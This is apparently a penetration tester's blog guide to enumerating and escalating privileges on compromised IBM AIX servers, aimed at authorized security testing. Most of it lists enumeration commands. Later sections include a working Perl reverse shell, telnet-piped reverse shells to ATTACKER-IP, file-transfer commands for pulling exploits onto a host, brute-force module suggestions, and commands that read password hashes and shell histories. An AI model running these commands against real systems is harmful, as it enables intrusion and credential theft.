# AIX for Penetration Testers

AIX enumeration guide for penetration testers.

UPDATE: I’ve created a GitHub repo with all the enumeration tips below. You can find the repo here: https://github.com/V1V1/AIX-for-Penetration-Testers

# Background

On a recent internal pentesting engagement I managed to get an unprivileged shell on one of my client’s servers. It was a business critical server so enumerating it and rooting it was the next logical move to make.

I always begin my enumeration by running the “uname -a” command to get some basic system information; funny thing though, this time around I had no idea what some of the output meant.

This was my first encounter with privilege escalation on AIX and I was pretty surprised by how little information I found online on enumerating AIX systems. Most of the post-exploitation guides/posts I read only mentioned where the user password hash file is stored (/etc/security/passwd) since it’s different from the regular location (/etc/shadow). But after I spent a little time aimlessly running commands that kept failing, I quickly realised that this wasn’t the only difference between AIX and other Unix systems.

It took me a little time going through various AIX system administration guides and command cheatsheets (links at the bottom of the post) and putting together a list of various post-exploitation techniques to use on the box. I decided to put this blog-post up with the hope that it will one day help another clueless pentester/red teamer.

# AIX

AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. AIX is an enterprise-class OS so it tends to be preferred by large organisations like banks, governments, insurance companies, power stations and universities.

AIX’s default shell was Bourne shell (/bin/sh) up to AIX version 3, but was changed to Korn shell (/bin/ksh). The most recent version of AIX at the time of writing is AIX 7.2.

I should make it clear that majority of the basic Unix commands will work on AIX systems; navigation, directory listing, process listing, file manipulation, searching and grepping etc. You’re not going to have to relearn Unix administration from scratch. But there are some tricks you may want to add to your arsenal if you want to adequately enumerate an AIX server.

# AIX Enumeration

There are already plenty of great Linux post-exploitation guides on the web (links at the bottom of the post) and a lot of the enumeration techniques in them will work on AIX. So I’m going to try as much as possible not to reinvent the wheel, there will be a little repetition of basic/familiar commands but I’ll do my best to keep it to a minimum.

I like to split my system enumeration into 7 general sections, so this is what I’ll use to structure this post:

## 1. System Info

prtconfPrints system configuration.This will give you a significant amount of information about the system; architecture, processor and memory information, network information, storage information etc.
This is probably the first command you should run on AIX systems since it will give you a lot of useful information about the server.
uname -aPrints the OS name, hostname, release number of the operating system, operating system version and machine ID.-
uname -xPrints the information specified with the “-a” flag as well as the LAN network number, as specified by the “-l” flag.-
uname -MPrints the system model.-
uname -uDisplays the system ID/serial number.-
oslevel -sPrints AIX version information.Sample output:
6100-07-05-1228

The first four digits are the major release e.g. AIX 6.1
The next two digits denote the TL (Technology Level) e.g. TL07
The third set of digits are the SP (Service Pack) e.g. SP05
The final four digits are the (US format) date of this release e.g. 28th December
lscfg -pPrints list of all installed resources.-
lsdev -C | sort -dPrints list of all hardware attached to the server.-
lsdev -C | sort -dlssrc -a Prints list of all system resources on the server.-

## 2. Users & Groups

idPrints current user’s details and group information.-
w
who -a
last -a
Prints information about logged in users.-
cat /etc/passwdPrints list of all users.-
lsuser ALLPrints list of all users and their attributes.-
cat /etc/groupPrints list of all groups.-
lsgroup ALLPrints list of all groups and their attributes (including members).-
cat /etc/security/passwdPrints list of all user’s password hashes (requires root).AIX password hashes aren’t stored in a similar format to other Unix systems. More on this later.

### AIX User Management

If you manage to get access to an account with user management privileges, this section might come in handy.

usermodchuserModify a user.
userdelrmuserDelete a user.
usermod -schsh OR passwd -sChange a user’s shell.
passwd -lchuser login=falseLock a user’s account.

## 3. Drives & Shares

lspvPrints list of disks on the server.Sample output:
hdisk1 004ce4cf0ff6d5c6 rootvg active
hdisk2 00c9b8fa3120beb9 datavg active

In this example the system has 2 physical disks and they are assigned to 2 Volume Groups (rootvg and datavg).
Every AIX system has a “rootvg” as this is where AIX is installed and the system is booted from.
lspv hdisk0Prints information about a specified hard disk.-
lsvgPrints a list of all volume groups.A VG (Volume Group) is a local disk which can consist of one or more disks or LUNs (logical unit number).
VGs enable files to be spread across multiple disks (aka Physical Volumes or PVs).
lsvg -l rootvgPrints information about a specified volume group.-
mountPrints information about all mounted filesystems.-
df -k
df -h
Prints mounted filesystem information; disk usage, mount location etc.-
lsps -aPrints paging space information.-
lslpp -L | grep nfsVerifies if NFS is installed.-
lssrc -g nfs | grep activeCheck NFS/NIS status.-
cat /etc/xtabChecks to see if it is an NFS server and what directories are exported.-
showmountShow hosts that export NFS directories.-
showmount -eShow what directories are exported.-

## 4. Network Info

ifconfig -aPrints information about the server’s network interfaces.-
lsdev -Cc ifPrints hardware information about the server’s network interfaces.-
netstat -iPrints a table of all network interfaces.-
netstat -nrPrints the server’s routing table.-
arp -aPrints the server’s arp table.-
namerslv -IsPrints a list of all the nameservers the server has access to.-
hostent -SPrints a list of all host entries on the server.-
grep 80 /etc/servicesPrints information about a specified running service.-

## 5. Process Info

ps auxPrints running process information.-
who -p /var/adm/wtmpPrints the processes from users logged into the server.-

echo $PATHPrints the current user’s path/environment.- whereis <PROGRAM>Locates a specified program on the server.- which <PROGRAM>Locates a specified program on the server (will only search the current user’s path/environment).- lslpp -LPrints a list of the server’s software inventory.- lslpp -hPrints a list of the server’s software history.- lslpp -L | grep <PROGRAM>Searches the server’s software inventory for a specific program.- rpm -qaPrints a list of all installed rpm packages.- rpm -qa | grep <PACKAGE>Searches for a specific program in all installed rpm packages.- ls -l /usr/bin/usr/bin directory listing.- ## 7. Config & Miscellaneous Before I get into this section, I’ll mention that there is no exhaustive guide to enumerating every server’s configuration since this is completely dynamic and will vary based on the environment and the respective system’s purpose. The post-exploitation guides at the bottom of this post have a long list of techniques that you will help you out in this phase. That said, I’ll summarise some general strategies that may come in handy. TargetStrategiesSample commands Configuration filesLike most Unix systems, AIX has a ‘/etc’ directory where you’re likely to find lots of configuration files, so take your time going through it. Search individual user’s home directories for configuration directories/files e.g. the ‘.ssh’ folder. Also search additional/3rd party software directories and files. AIX is often used for sensitive applications such as core banking systems and you may be fortunate enough to find gems like hard-coded database passwords in these files. ls -l /etc ls -lR /etc/ | grep “conf” ls -lR /path/to/somewhere/ | grep “config” User activityShow me your shell history and I’ll show you who you are. A user’s history can often reveal a lot of sensitive information. I’ve often come across admin’s echoing passwords into commands to avoid inputting them in interactive prompts. Search home folders and other directories for scripts written by server admins, these can occasionally be gold mines. cat /home/USER/.sh_history cat /home/USER/.vi_history cat /home/USER/.profile grep ^sh /home/*/.*hist* grep ^ssh /home/*/.*hist* grep ^telnet /home/*/.*hist* Cron jobsCron allows admins to schedule tasks to run any hour of the day or night, making regular upkeep a breeze. Customs scripts specified in cron jobs can often contain sensitive information like passwords. crontab -l cat /var/spool/cron/crontabs cat /var/adm/cron/log cat /var/adm/cron/cron.deny cat /var/adm/cron/cron.allow LogsLog files can occasionally contain sensitive information. AIX has various directories you should search for potentially sensitive log files. You can also use the ‘alog’ utility to view specific logs. AIX also comes with the ‘errpt’ utility which you can use to generate error reports from entries in an error log. You can read more about its usage here. ls /var/log/ ls /var/adm cat /var/log/messages cat /var/adm/messages cat /var/adm/ras/errlog # List all available logs alog -L # Views a specific log (e.g. to view the boot log; alog -o -t boot) alog -o -t LOG # View most recent error log entries errpt | head Archive filesArchive files are often used to backup data and you may come across archive files which contain sensitive information (e.g. application passwords, configuration files, ssh keys and databases). Use find to discover archive files (e.g. .tar, .gz, .a) AIX libraries with the “.a” extension are ‘ar’ compressed files. ar is a compressing utility of archive files. The tool is installed by default on AIX. ls -lR /path/to/somewhere/ | grep “\.tar” ls -lR /path/to/somewhere/ | grep “\.gz” ls -lR /path/to/somewhere/ | grep “\.a” “Interesting” filesAgain, this varies significantly depending on the server’s purpose. The ‘find’ command works on AIX, so the options here are limitless. Some general strategies: 1. Review all SUID/SGID/SETUID/SETGID files. 2. Search and grep for files with interesting string e.g. password. 3. Search the ‘/tmp’ directory. find / -user root -perm -4000 -print 2>/dev/null find / -perm -1000 -print 2>/dev/null find / -perm -2000 -print 2>/dev/null find / -perm -3000 -print 2>/dev/null grep -rnw /path/to/somewhere/ -e “password” ls -la /tmp # Extra This section was a bit of an afterthought but I decided to throw it in anyway. It’s basically a few techniques involving default AIX packages/services that you may find useful at various stages of your assessment. ## 1. Exploitation – getting your initial foothold The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers. PortServiceAttack Vector 21FTPBrute force. Metasploit module: auxiliary/scanner/ftp/ftp_login 22SSHBrute force. Metasploit module: auxiliary/scanner/ssh/ssh_login 23TelnetBrute force. Metasploit module: auxiliary/scanner/telnet/telnet_login 512rexecBrute force. Metasploit module: auxiliary/scanner/rservices/rexec_login 513rloginBrute force. Metasploit module: auxiliary/scanner/rservices/rlogin_login 80, 443 and countless others; this will vary depending on what additional software is installed on the server.WebDefault passwords, brute force, shell uploads (WAR, jsp) etc. ## 2. Reverse shells So you have command execution and want to level up and get a reverse shell? Setup a listener and try a few of the commands below. Software/PackageCommand Perl/usr/bin/perl -e ‘use Socket;$i=”ATTACKER-IP”;$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton(\$i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};
Telnettelnet ATTACKER-IP 80 | /bin/sh | LOCAL-IP 44445
Telnettelnet ATTACKER-IP 80 | /bin/sh | telnet ATTACKER-IP 443

NOTE: Remember to listen on both port 80 & 443.

## 3. TTY shells

As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.

 Perl perl -e ‘exec “/bin/sh”;’ Perl perl: exec “/bin/sh”;

At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server.

Default AIX installations are missing a lot of the basic utilities you’re likely to come across on other Unix systems. The server I was on didn’t have wget, curl or nc installed. Admins may install some of them as additional utilities, but it’s safer to assume you won’t find any of them on the box.

Fortunately, there are some default programs installed on AIX that can aid you with file downloads.

Software/PackageCommand
FTPftp ATTACKER-IP

get FILE
exit
SCPscp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE
Telnet(echo ‘GET /FILE’; echo “”; sleep 1; ) | telnet ATTACKER-IP 80 > FILE’

NOTE: This command will also record some unnecessary telnet command output at the top of the downloaded file which could affect execution if it’s a shell script You can use tail to strip this unnecessary output:

tail -n +6 FILE > FILE2

## 5. Privilege Escalation

IBM is quite proud of AIX’s security reputation, with good reason too; there aren’t a lot of exploits out there for their product. Good news is that Offensive Security’s Exploit Database does have a number of privilege escalation exploits for various versions of AIX that you may find useful.

AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file. I had mentioned earlier that these hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for various hashing mechanisms used by AIX systems, you can find some example hashes here (search for AIX).

I also found a Metasploit module that uses John the Ripper to identify weak passwords acquired from AIX systems, but I haven’t tried this out yet. I’ll be sure to update this post when I do.

# Summary

Like I said at the beginning, I wrote this post because I was desperately looking for something like it when I was starting my AIX post-exploitation.

It’s not a comprehensive guide to AIX/Unix enumeration, but with any luck it may come to the aid of another despairing internet adventurer in the future. If it helps just one person, then it’s served its purpose. Happy hunting.

# References

I went through some incredibly informative material that helped me out both during my engagement (yes, I did root the server 🙂 ) and the writing of this post.